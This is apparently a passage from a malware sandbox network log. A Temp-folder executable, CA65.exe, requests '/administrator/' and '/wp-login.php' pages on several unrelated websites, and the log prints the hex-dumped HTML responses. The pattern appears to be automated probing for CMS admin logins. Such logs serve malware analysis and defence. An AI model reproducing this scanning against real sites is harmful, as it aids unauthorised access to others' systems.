2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f 63 6f 6f 6b 69 65 73 5f 74 79 70 65 22 3a 22 6e 61 Data Ascii: .com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__cookies_type":"na
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 Data Ascii: re that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/administrator/'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you will be
2023-12-22 20:14:54 UTC	1254	IN	Data Raw: 77 5f 70 61 73 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 0a Data Ascii: w_pass_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCString()]
2023-12-22 20:14:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	58593	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	181	OUT	GET /administrator/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	867	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: s-maxage=10 Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: PHPSESSID=2fl36mfrg7n47mi7p87aekl7e6; path=/ X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9KRprcAm2NRvcUMjMItSEd7MyD5fjCCT%2BEpvAdaeWbL0PlsHIJYVYd0prxo16r8uRTrfWNNRW0AFKEuXMsDEXBrvSfK6f1QdywI3pIe9ec2v6IqfXXf1UgcNY5bGISI3UkbL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08a20dc49acb-MIA
2023-12-22 20:14:54 UTC	502	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 09 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 Data Ascii: 2000<!DOCTYPE html><html lang="en-US" class="no-js"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 70 62 32 30 32 31 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e Data Ascii: con" href="https://theproducebox.com/wp-content/themes/tpb2021/assets/images/favicon.ico" /> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.7 - https://yoast.com/wordpress/plugins/seo/ -->
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 75 6e 64 5f 53 6d 61 6c 6c 2d 31 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 38 2f 54 50 42 5f 4c 6f 67 6f 5f 47 72 65 65 6e 5f 42 61 63 6b 67 72 6f 75 6e 64 5f 53 6d 61 6c 6c 2d 31 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 37 34 35 2c 22 68 65 69 67 68 74 22 3a 37 34 34 2c 22 63 61 70 74 69 6f 6e 22 3a 22 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 22 7d 2c 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 Data Ascii: und_Small-1.png","contentUrl":"https://theproducebox.com/wp-content/uploads/2021/08/TPB_Logo_Green_Background_Small-1.png","width":745,"height":744,"caption":"The Produce Box"},"image":{"@id":"https://theproducebox.com/#/schema/logo/image/"}}]}</script>
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 Data Ascii: uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d Data Ascii: URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"}
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 Data Ascii: em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='https://theproducebox.com/wp-includes/css/dist/block-library/style.min.css?ver=6
2023-12-22 20:14:54 UTC	853	IN	Data Raw: 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 Data Ascii: e-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 34 30 30 30 0d 0a 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 Data Ascii: 4000209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-g
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 Data Ascii: ow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: lef
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d Data Ascii: ayout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	58594	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	178	OUT	GET /administrator/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	979	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVu7lUeLgnKFsw4eyPF4vSenTgb5ma%2B3MZWQWbAUYbPT30MilW7VogIPr%2B%2FKOGBapxPj731dAVMOcL9etn2MWxDP0HHs9OCIzycLfHMiO%2Brrv1Y5NEu2SjcJtRv5bSeu5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08a298410359-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	58592	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	330	OUT	GET /administrator/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_SpjijudlDX2V7Wi6FgyTdx3DUV82xyfmrN1K924+fK8vyswuX6RAQubndsKV0spb5q2ro5nUfbnIe7t7oGdUlw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:53 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	58602	34.149.87.45	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	186	OUT	GET /wp-login.php HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	1084	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276093.950171060811838909 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:14:54 GMT X-Served-By: cache-dfw-kdfw8210030-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalk/nmsEX1RihcfYTAuWmPIVrvQThthCJtZ4MM8WOOvl7eYd1852DtYyyQdHC9ligiA==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,hUeKicgprlF3Ei9qMBzezHDp2DKwVkOLOSLKHrQkz7w=,WDMzHiyOL7uW518fW2Byr2GuGiStFB9OWrVR4y4nAsbQHalDg5GXgutSG6W0vh+Sw9doegBPDuevU6lQBO5pKA== Transfer-Encoding: chunked Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:14:54 UTC	168	IN	Data Raw: 62 37 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c Data Ascii: b71 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scal
